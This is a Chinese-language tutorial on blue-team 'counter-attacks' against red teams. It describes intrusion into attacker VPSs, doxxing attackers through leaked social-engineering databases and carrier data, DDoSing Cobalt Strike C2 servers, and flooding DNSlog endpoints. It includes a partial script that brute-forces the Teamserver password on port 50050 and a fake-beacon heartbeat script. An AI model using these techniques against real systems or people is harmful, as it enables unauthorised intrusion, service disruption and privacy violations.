蓝队反制红队手法详解

取证反查技术

IP溯源技术

1. 获取真实IP

   • 从样本分析或流量捕获中获取攻击者真实IP
   • 若攻击者使用云WAF或CDN，需协调服务商获取真实IP

2. IP信息查询

   • Whois查询：http://ipwhois.cnnic.net.cn/
   • 批量IP归属查询工具：
     • http://ip.tool.chinaz.com/siteip
     • http://www.jsons.cn/ipbatch/
     • https://ip.tool.chinaz.com/
     • http://cip.cc/
   • 精准定位工具：
     • https://www.ipuu.net/
     • https://chaipip.com/aiwen.html

3. 反渗透技术

   • 对攻击者IP进行端口和服务探测
   • 尝试反渗透获取攻击者VPS信息
   • 国内IP可通过公安网警协助查证

4. 威胁情报分析

   • 使用威胁情报平台分析IP历史记录：
     • https://x.threatbook.cn/
   • 样本分析平台：
     • https://www.virustotal.com/

5. 社工溯源

   • 通过Whois获取邮箱、QQ、手机号
   • 使用社工库查询关联信息
   • 通过手机号关联社交账号（QQ、微信、抖音等）
   • 如有权限，可通过GA数据或运营商数据深入溯源

常见红队被反杀姿势

1. 个人设备使用不当

   • 使用个人工作PC进行攻击
   • 浏览器保存了国内主流网站登录凭据
   • 踩到蓝队蜜罐被JsonP劫持漏洞捕获社交ID

2. 基础设施暴露

   • 使用个人网站VPS进行扫描
   • VPS上含有组织HTTPS证书
   • VPS IP绑定的域名与安全社交ID对应

3. 工具特征暴露

   • 扫描器payload含有攻击者信息
   • 使用私有DNSlog
   • 攻击载荷含有安全社交ID或个人博客资源请求

4. 钓鱼样本被反制

   • 钓鱼邮件内木马样本被蓝队采集
   • 样本被逆向分析
   • C2服务器被反控

5. 虚拟机逃逸

   • 虚拟机逃逸暴露实体机信息
   • 泄露全部真实信息

Cobalt Strike反制技术

1. DDOS攻击C2服务器

• 批量上线钓鱼马，启动大量进程
• 使红队C2服务器瘫痪
• 参考脚本：https://github.com/Tk369/pluginS/blob/master/ll.py

2. 爆破CS密码

• 红队CS通常使用弱口令
• 针对Teamserver端口50050进行爆破
• 爆破脚本示例：

#!/usr/bin/env python3
import time,socket,ssl,argparse,concurrent.futures,sys

# 省略部分代码...

def passwordcheck(password):
    if len(password) > 0:
        conn = Connector()
        conn.open(args.host, 50050)
        payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))
        conn.send(payload)
        if conn.is_connected(): result = conn.receive()
        if conn.is_connected(): conn.close()
        if result == bytearray(b"\x00\x00\xca\xfe"): return password
        else: return False
    else: print("Do not have a blank password!!!")

3. 假上线技术

• 模拟发送心跳包使攻击者无法执行命令
• 示例代码：

# coding: utf-8
import re
import time
import requests

def heartbeat():
    url = "http://192.168.186.133:333/activity"
    headers = {
            'Cookie': 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M=',
            'Host': '192.168.186.133:333',
            'Accept': '*/*',
            'Connection': 'Keep-Alive',
            'Cache-Control': 'no-cache',
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)'
        }
    resp = requests.get(url=url,headers=headers)
    text = resp.content.hex()
    return text

DNSLOG/HTTPLOG反制技术

DNSLOG反制

• 批量ping捕获到的DNSLOG地址
• 制造大量垃圾DNSLOG数据干扰攻击者
• 迫使红队废弃基础设施

HTTPLOG反制

• 使用爬虫节点批量请求捕获的HTTP URL
• 制造大量无效请求污染日志
• 使红队难以获取有效信息

总结

蓝队反制红队的关键在于：

1. 完善的取证和溯源能力
2. 对红队基础设施的深入理解
3. 主动防御和反制技术
4. 多维度信息关联分析

参考资源：

• https://k8gege.org/p/40523.html
• https://www.anquanke.com/post/id/219059
• https://mp.weixin.qq.com/s/vZzDUZsqfAZR9VRDMLXxJA
• https://mp.weixin.qq.com/s/AZwKkEeTErPeOrkVH2Mirw